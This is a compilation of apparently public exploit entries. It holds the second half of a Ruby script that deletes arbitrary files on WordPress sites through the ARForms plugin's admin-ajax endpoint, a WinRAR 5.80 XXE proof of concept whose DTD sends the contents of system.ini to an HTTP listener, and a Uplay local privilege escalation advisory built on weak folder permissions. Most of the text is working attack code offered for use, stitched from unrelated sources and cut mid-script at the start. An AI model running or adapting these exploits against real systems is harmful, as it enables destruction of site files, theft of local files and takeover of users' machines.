check_existence_arform_folder execute_deletion_attack puts "Done ... see ya " + name end def send_checks(files_names) j = 1 while j <= files_names.length-1 uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j]) http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0" request["Connection"] = "keep-alive" request["Accept-Language"] = "en-US,en;q=0.5" request["Accept-Encoding"] = "gzip, deflate" request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" begin response = http.request(request).code puts "The File " + files_names[j] + " has the response code of " + response rescue Exception => e puts "[!] Failed!" puts e end j = j+1 end end def check_existence_arform_folder () path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"] $i = 0 results = [] while $i <= path_array.length-1 uri = URI.parse("http://#{$host}/#{path_array[$i]}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) results[$i] = response.code #puts"response code is : " + response.code $i +=1 end puts "****************************************************" if results[0] == "200" || results[0] =="301" puts "The Plugin is Available on the following path : ".green + $host + path_array[0] else puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red exit end if (results[1] == "200" || results[1] == "301") puts "The User Files folder is Available on the following path : ".green + $host + path_array[1] else puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1] end puts "****************************************************" end def execute_deletion_attack () puts "How many file you want to delete my man" amount = STDIN.gets.chomp.to_i if(amount == 0) puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue exit end file_names = [] file_names[0] = "143_772_1569713145702_temp3.txt" j = 1 while j <= amount.to_i puts "Name of the file number " + j.to_s file_names[j] = STDIN.gets file_names[j].strip! j = j+1 end uri = URI.parse("http://#{$host}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie $i = 0 while $i <= file_names.length-1 puts "Starting the Attack Journey .. ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615', 'Accept-Encoding' => 'gzip, deflate', 'Cookie' => global_cookie, 'X_FILENAME' => file_names[$i], 'X-FILENAME' => file_names[$i], 'Connection' => 'close' } http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path, headers) request.body = File.read("post_file") response = http.request request $i = $i +1 end execute_delete_request file_names,global_cookie,amount.to_i puts "Finished.........." end def execute_delete_request (file_names,cookies,rounds ) $i = 0 while $i <= file_names.length-1 puts "Starting the Attack on file No #{$i.to_s} ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With'=> 'XMLHttpRequest', 'Cookie' => cookies, 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding' => 'gzip, deflate', 'Connection' => 'close' } http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path,headers) request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143" response = http.request(request) if $i != 0 puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code end $i = $i +1 end send_checks file_names end start_function()

# Exploit Title: winrar 5.80 - XML External Entity Injection # Exploit Author: hyp3rlinx # Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit # POC 1- python -m SimpleHTTPServer (listens Port 8000) 2- open winrar or any file.rar 3- help 4- help topics 5- Drag the exploit to the window html file <htmlL> <body> <xml> <?xml version="1.0"?> <!DOCTYPE flavios [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd"> %dtd;]> <pwn>&send;</pwn> </xml> </body> </html> ============================== start.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>"> %all;

# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation # Date: 2019-08-07 # Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi # Vendor Homepage: https://uplay.ubisoft.com/ # Version: 92.0.0.6280 # Tested on: Windows 10 x64 # CVE : N/A # Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission # that allows all BUILTIN-USER has full permission. An attacker replace the # vulnerability execute file with malicious file. /////////////////////// Proof of Concept /////////////////////// C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) Vulnerability Disclosure Timeline: ================================== 07 Aug, 19 : Found Vulnerability 07 Aug, 19 : Vendor Notification 14 Aug, 19 : Vendor Response 18 Sep, 19 : Vendor Fixed 18 Sep, 19 : Vendor released new patched